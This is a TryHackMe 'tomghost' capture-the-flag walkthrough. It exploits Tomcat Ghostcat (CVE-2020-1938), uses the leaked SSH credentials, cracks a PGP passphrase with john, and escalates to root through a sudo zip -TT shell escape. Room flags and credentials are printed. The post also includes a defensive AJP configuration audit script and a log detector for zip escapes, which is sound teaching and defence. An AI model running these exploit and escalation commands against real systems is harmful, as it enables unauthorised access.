Tryhackme - tomghost

In this walk through, we will be going through the tomghost room from Tryhackme. This room is rated as easy on the platform and the objective is to identify recent vulnerabilities in order to exploit the system or read files that we should not have access to. So, let’s get started without any delay.

tomghost

Machine Info:

Title: tomghost
IP address: 10.10.203.67
Difficulty: Easy
Objective: Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

Enumeration:

  • Checking whether the machine is live.

pinging the machine

  • I started with a normal Nmap scan with version detection.

sudo nmap -sS -sV 10.10.222.43 

nmap scan

  • Next, I used gobuster to brute-force directories and reveal some juicy ones.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.222.43:8080/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.43:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/13 21:02:54 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]             
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]     
                                                                  
===============================================================
2023/04/13 21:04:31 Finished
===============================================================

gobuster scan

  • Googling “Apache Tomcat 9.0.30 vulnerabilities” turned up one: CVE-2020-1938 (Ghostcat).

CVE-2020-1938 (Ghostcat)

Exploit: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat

  • Firing off the exploit, we found a potential username and password combination beneath the Welcome section. We can now use it to get our initial access via SSH.

wh1terose@fsociety:~/CTF/TryHackme/tomghost/Hacking-Vulnerability-CVE-2020-1938-Ghostcat$ python2 CVE-2020-1938.py 10.10.222.43 -p 8009 -f WEB-INF/web.xml 
Getting resource at ajp13://10.10.222.43:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
	skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

ghostcatexploit
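Ghostcat works because the AJP connector that Tomcat 9.0.30 enables by default on port 8009 neither requires a shared secret nor is bound to loopback, so any client that can reach the port can have Tomcat read files under the web application root, which is how WEB-INF/web.xml (and the credentials someone left in its description) came out above. The fix landed in 9.0.31 (connector commented out, loopback address, secretRequired defaulting to true), and the same three settings are what a defender audits on an existing install. The script below is an added example and is not code from this walkthrough or from the exploit repository; it parses a server.xml and flags enabled AJP connectors that are reachable beyond loopback or lack a secret. Both embedded server.xml snippets are constructed for the example.

```python
"""Audit a Tomcat server.xml for the AJP exposure behind CVE-2020-1938.

Added example for this walkthrough; not code from the original post or from
the exploit repository. It assumes the stock Tomcat 9 server.xml layout
(Server > Service > Connector) and reports, per enabled AJP connector,
whether it is reachable beyond loopback and whether it lacks a shared secret.
"""
import xml.etree.ElementTree as ET

# Constructed sample resembling the stock 9.0.30 configuration: AJP on 8009,
# no 'address' binding, no 'secret'. This is the exposed state.
VULNERABLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed hardened sample: AJP is commented out entirely. If a reverse
# proxy needs it, bind it to loopback and require a secret instead.
HARDENED_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000" redirectPort="8443" />
    <!--
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_LONG_RANDOM_SECRET" />
    -->
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml: str) -> list:
    """Return (port, issue) tuples for every enabled AJP connector.

    ElementTree drops XML comments, so a commented-out connector is
    treated as disabled and produces no finding.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for connector in root.iter("Connector"):
        protocol = connector.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        port = connector.get("port", "8009")
        address = connector.get("address")
        # Ghostcat needs network reach to the connector: anything not bound
        # to loopback is reachable from wherever the Tomcat host is reachable.
        if address not in LOOPBACK_ADDRESSES:
            findings.append((port, "exposed-interface"))
        # Without a secret (or with secretRequired="false", the pre-9.0.31
        # behaviour) Tomcat trusts any client that reaches the port.
        secret_required = connector.get("secretRequired", "true").lower() == "true"
        if not connector.get("secret") or not secret_required:
            findings.append((port, "no-secret"))
    return findings


def describe(findings: list) -> str:
    """Render findings as a short human-readable report."""
    if not findings:
        return "OK: no enabled AJP connector is exposed or secret-less"
    advice = {
        "exposed-interface": "bind it to 127.0.0.1 (address attribute) or remove it",
        "no-secret": 'set secretRequired="true" and a long random secret',
    }
    return "\n".join(f"AJP connector on port {port}: {issue}; {advice[issue]}"
                     for port, issue in findings)


if __name__ == "__main__":
    print(describe(audit_ajp(VULNERABLE_SERVER_XML)))
    print(describe(audit_ajp(HARDENED_SERVER_XML)))
```

Run it against /opt/tomcat/conf/server.xml (or wherever the instance keeps its configuration) on each Tomcat host; a clean result means either no AJP connector is enabled or every enabled one is loopback-only and secret-protected. Note that the script reads only server.xml: it cannot tell you whether port 8009 is additionally filtered by a host firewall, and it does not check the separate problem of secrets stored in deployment descriptors such as the web.xml above.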

Gaining Access:

  • Let’s log in to the server over SSH using the credentials below.

Creds: skyfuck:8730281lkjlkjdqlksalks

ssh login

user.txt

  • Found two files: one .asc file and one .pgp file. We will target the .asc file first, as it contains a private key.

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$ cat tryhackme.asc 
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.63
<-- snipped -->

-----END PGP PRIVATE KEY BLOCK-----

  • Cracking the key’s passphrase using john. First I converted the .asc file into a john-crackable format using gpg2john and then ran john on it.

wh1terose@fsociety:~/CTF/TryHackme/tomghost$ gedit hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/gpg2john hash.txt > crack

File hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ls
crack  Hacking-Vulnerability-CVE-2020-1938-Ghostcat  hash.txt
wh1terose@fsociety:~/CTF/TryHackme/tomghost$ ~/Tools/john/run/john crack 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-13 21:53) 0g/s 21405p/s 21405c/s 21405C/s Comstuxnet1900..Cstuxnet1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
alexandru        (tryhackme)     
1g 0:00:00:00 DONE 2/3 (2023-04-13 21:53) 1.052g/s 21303p/s 21303c/s 21303C/s rooney..blahblah1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

  • GPG password: alexandru

  • Decrypting the pgp file using the above cracked password.

skyfuck@ubuntu:~$ gpg -d credential.pgp 

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <[email protected]>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
skyfuck@ubuntu:~$ 

gpg -d credential.pgp

Merlin password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

change user to merlin

Privilege Escalation:

  • First I checked whether there is any binary we can run with sudo, and found one.

merlin@ubuntu:/$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

sudo -l

  • Using GTFOBins to elevate our privileges via the zip binary.

GTFObins zip

merlin@ubuntu:/$ TF=$(mktemp -u)
merlin@ubuntu:/$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/
# cd root
# ls
root.txt  ufw
# cat root.txt	
THM{Z1P_1S_FAKE}

root flag
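The weakness here is the sudoers entry itself: granting NOPASSWD root execution of zip is equivalent to granting a root shell, because zip accepts -TT (and the long form --unzip-command) to name the program it runs in place of unzip when testing an archive. The fix is to drop that entry, or at least not to grant sudo to archive tools that take a test-command option. For detection, sudo writes every command it runs to the system log (auth.log on Ubuntu), so the -TT abuse above leaves a clear trace. The script below is an added example, not code from the walkthrough or from GTFOBins; it parses sudo's log lines and raises an alert for each sudo'd zip invocation that hands control to an external command. The log excerpt it scans is constructed for the example.

```python
"""Detect zip-based sudo shell escapes in auth.log.

Added example for this walkthrough; not code from the original post or from
GTFOBins. It assumes the syslog line format sudo writes on Ubuntu
("sudo:   user : TTY=... ; PWD=... ; USER=... ; COMMAND=...") and the log
lines embedded below are constructed for the example.
"""
import re
from os.path import basename

# Constructed auth.log excerpt: one -TT escape like the walkthrough's, one
# pam_unix session line, one legitimate zip run, one --unzip-command variant
# and one unrelated command.
SAMPLE_AUTH_LOG = """\
Apr 13 21:54:02 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/zip /tmp/tmp.Xk2a9 /etc/hosts -T -TT sh #
Apr 13 21:54:02 ubuntu sudo: pam_unix(sudo:session): session opened for user root by merlin(uid=0)
Apr 13 22:10:15 ubuntu sudo:   merlin : TTY=pts/0 ; PWD=/home/merlin ; USER=root ; COMMAND=/usr/bin/zip /tmp/backup.zip /home/merlin/notes.txt
Apr 13 22:11:00 ubuntu sudo:   alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/zip /tmp/b.zip /etc/hosts --unzip-command=sh
Apr 13 22:12:30 ubuntu sudo:   alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+"
    r"(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)


def parse_sudo_line(line):
    """Return the fields of a sudo command-log line, or None for other lines
    (pam_unix session messages, for example)."""
    m = SUDO_LINE.match(line)
    return m.groupdict() if m else None


def zip_runs_external_command(argv):
    """True when zip is told to run a program of the caller's choosing:
    -TT / --unzip-command replace unzip as the archive-test command, so the
    named program runs with zip's (here: root's) privileges."""
    return any(arg == "-TT" or arg.startswith("--unzip-command")
               for arg in argv[1:])


def detect_zip_escapes(log_text):
    """Scan auth.log text and return one alert per sudo'd zip invocation
    that hands control to an external command."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        argv = rec["cmd"].split()
        if not argv or basename(argv[0]) != "zip":
            continue
        if zip_runs_external_command(argv):
            alerts.append({"ts": rec["ts"], "user": rec["user"],
                           "runas": rec["runas"], "cmd": rec["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_zip_escapes(SAMPLE_AUTH_LOG):
        print(f"[{alert['ts']}] {alert['user']} -> {alert['runas']}: {alert['cmd']}")
```

Feed it the real file (for example by reading /var/log/auth.log into the function) or wire the same regex into your log pipeline. The zip-specific check is deliberately narrow; the more general control is to review sudo -l output for every account and remove NOPASSWD entries for any binary that can spawn a program, since sudo logging only tells you about the abuse after it has happened.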

Task 1 – Flags

Question 1 – Compromise this machine and obtain user.txt

THM{GhostCat_1s_so_cr4sy}

Question 2 – Escalate privileges and obtain root.txt

THM{Z1P_1S_FAKE}

Conclusion:

So that was “tomghost” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection and found two open ports: 22 (SSH) and 8080 (Apache Tomcat). Next, we fired gobuster to brute-force directories and reveal some juicy ones. Moving on, I looked for known exploits for Apache Tomcat 9.0.30 and found CVE-2020-1938 (Ghostcat). Using the exploit, we got the credentials, logged into the server and obtained initial access. Once inside, we found two files, one .asc and one .pgp. We converted and cracked the .asc key with john and used that passphrase to decrypt the .pgp file, which revealed the user merlin and his password. At last, we used the zip binary sudo misconfiguration to escalate our privileges, get the root flag and the hair of the neighbor’s black cat for our voodoo procedure. On that note, I will take your leave and will see you in the next one. Till then, “Hack the Planet”.
